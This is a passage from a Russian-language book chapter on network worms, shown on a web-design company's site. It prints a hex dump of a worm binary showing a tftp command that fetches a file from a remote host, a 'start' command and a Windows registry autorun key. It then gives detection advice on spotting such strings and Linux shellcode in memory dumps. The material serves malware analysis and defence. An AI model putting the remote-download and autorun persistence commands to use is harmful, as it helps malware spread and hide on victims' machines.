Разработка динамических сайтов
SEO услуги
Управление контекстной рекламой

Вход на хостинг

Имя пользователя:*

Пароль пользователя:*

IT-новости

20.04.2016 iPhone 2017 года поместят в водонепроницаемый корпус из стекла

Линейка iPhone в новом году серьезно поменяется. В этом уверен аналитический исследователь Мин Чи Ку......

подробнее

30.07.2015 Ищем уникальный контент для сайта

Ищем уникальный контент для сайта Без уникального контента Ваш сайт обречен на то, что его страницы......

подробнее

11.05.2015 Распространённые ошибки разработчиков сайтов

Не секрет, что в сети Интернет насчитывается миллионы сайтов, и каждый день появляются тысячси новых......

подробнее

000021EC:  77 69 6E 64 6F 77 73 75 │ 70 64 61 74 65 2E 63 6F   windowsupdate.co

000021FC:  6D 00 25 73 0A 00 73 74 │ 61 72 74 20 25 73 0A 00   m %s start %s

0000220C:  74 66 74 70 20 2D 69 20 │ 25 73 20 47 45 54 20 25   tftp -i %s GET %

0000221C:  73 0A 00 25 64 2E 25 64 │ 2E 25 64 2E 25 64 00 25   s %d.%d.%d.%d %

0000222C:  69 2E 25 69 2E 25 69 2E │ 25 69 00 72 62 00 4D 00   i.%i.%i.%i rb M

0000223C:  64 00 2E 00 25 73 00 42 │ 49 4C 4C 59 00 77 69 6E   d . %s BILLY win

0000224C:  64 6F 77 73 20 61 75 74 │ 6F 20 75 70 64 61 74 65   dows auto update

0000225C:  00 53 4F 46 54 57 41 52 │ 45 5C 4D 69 63 72 6F 73    SOFTWAREMicros

0000226C:  6F 66 74 5C 57 69 6E 64 │ 6F 77 73 5C 43 75 72 72   oftWindowsCurr

0000227C:  65 6E 74 56 65 72 73 69 │ 6F 6E 5C 52 75 6E 00 00   entVersionRun

Ищите в дампе подозрительные сообщения, команды различных прикладных протоколов (GET, HELO и т. д.), имена системных библиотек, файлов-интерпретаторов, команды операционной системы, символы конвейера, доменные имена сайтов, обращение к которым вы не планировали и в чьих услугах судя по всему не нуждаетесь, IP-адреса, ветви реестра, ответственные за автоматический запуск программ и т. д.

При поиске головы червя используйте тот факт, что shell-код эксплоита, как правило, размещается в секции данных и содержит легко узнаваемый машинный код. В частности, команда CDh 80h (INT 80h), ответственная за прямой вызов системных функций операционных систем семейства Linux, встречается практически во всех червях, обитающих на этой ОС.

Вообще говоря, проанализировав десяток различных червей, вы настолько проникнетесь концепциями их устройства, что без труда распознаете знакомые конструкции и в других организмах. А заочно червей все равно не изучить.

Как побороть червя

– Как же тогда справиться с червями?

– Мне неизвестно оружие, кроме атомного, взрывчатой силы которого было бы

достаточно для уничтожения червя целиком.


Предыдущая страницаОглавлениеСледующая страница
 
[001] [002] [003] [004] [005] [006] [007] [008] [009] [010] [011] [012] [013] [014] [015] [016] [017] [018] [019] [020]
[021] [022] [023] [024] [025] [026] [027] [028] [029] [030] [031] [032] [033] [034] [035] [036] [037] [038] [039] [040]
[041] [042] [043] [044] [045] [046] [047] [048] [049] [050] [051] [052] [053] [054] [055] [056] [057] [058] [059] [060]
[061] [062] [063] [064] [065] [066] [067] [068] [069] [070] [071] [072] [073] [074] [075] [076] [077] [078] [079] [080]
[081] [082] [083] [084] [085] [086] [087] [088] [089] [090] [091] [092] [093] [094] [095] [096] [097] [098] [099] [100]
[101] [102] [103] [104] [105] [106] [107] [108] [109] [110] [111] [112] [113] [114] [115] [116] [117] [118] [119] [120]
[121] [122] [123] [124] [125] [126] [127] [128] [129] [130] [131] [132] [133] [134] [135] [136] [137] [138] [139] [140]
[141] [142] [143] [144] [145] [146] [147] [148]

+7 (831) 413-63-27
ООО Дельта-Технология ©2007 - 2023 год
Нижний Новгород, ул. Дальняя, 17А.
Rambler's Top100